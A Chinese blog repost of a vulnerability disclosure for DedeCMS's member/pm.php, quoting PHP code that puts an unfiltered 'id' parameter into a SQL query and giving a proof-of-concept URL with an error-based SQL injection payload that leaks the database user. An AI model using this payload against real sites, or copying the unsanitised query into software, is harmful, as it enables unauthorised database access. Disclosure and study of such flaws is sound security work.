member pm.php,Dedecms 会员中心注入漏洞5

客官°小女子只卖身不卖艺 2023-01-18 11:22 136阅读 0赞

漏洞作者： Matt

\[php\]member/pm.php

else if($dopost=='read')

$sql = "SELECT \* FROM \`\#@\_\_member\_friends\` WHERE mid='\{$cfg\_ml->M\_ID\}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";

$friends = array();

$dsql->SetQuery($sql);

$dsql->Execute();

while ($row = $dsql->GetArray()) \{

$friends\[\] = $row;

$row = $dsql->GetOne("SELECT \* FROM \`\#@\_\_member\_pms\` WHERE id='$id' AND (fromid='\{$cfg\_ml->M\_ID\}' OR toid='\{$cfg\_ml->M\_ID\}')");//ID没过滤

if(!is\_array($row))

ShowMsg('对不起，你指定的消息不存在或你没权限查看！','-1');

exit();

$dsql->ExecuteNoneQuery("UPDATE \`\#@\_\_member\_pms\` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='\{$cfg\_ml->M\_ID\}'");

$dsql->ExecuteNoneQuery("UPDATE \`\#@\_\_member\_pms\` SET hasview=1 WHERE folder='outbox' AND toid='\{$cfg\_ml->M\_ID\}'");

include\_once(dirname(\_\_FILE\_\_).'/templets/pm-read.htm');

exit();

\[/php\]

漏洞证明：

测试方法http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and @\`'\` and (select 1 from (select count(\*),concat(user(),floor(rand(0)\*2))x from information\_schema.tables group by x)a) and '1'='1

![b296a6522ced9a84ecddaae5eb7b8cf4.png][]

[b296a6522ced9a84ecddaae5eb7b8cf4.png]: /images/20221021/f2a80a211f7248f5b2a4a14e9c90838d.png

member pm.php,Dedecms 会员中心注入漏洞5

发表评论取消回复

还没有评论，来说两句吧...

相关阅读

相关 web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞

相关 member pm.php,Dedecms 会员中心注入漏洞5

相关 python os.popen基础/os.popen 安全注入（OS命令注入漏洞\subprocess.getstatusoutput OS命令注入漏洞）

相关 XXE注入漏洞

相关 ewei_shopv2 会员中心装修模板显示会员id的方法

相关 emseasy最新注入漏洞

相关【WEB】XPath注入漏洞

相关漏洞挖掘与防范（基础篇）SQL注入漏洞

相关 src 漏洞平台应急响应中心提交漏洞简介

相关 CRLF注入漏洞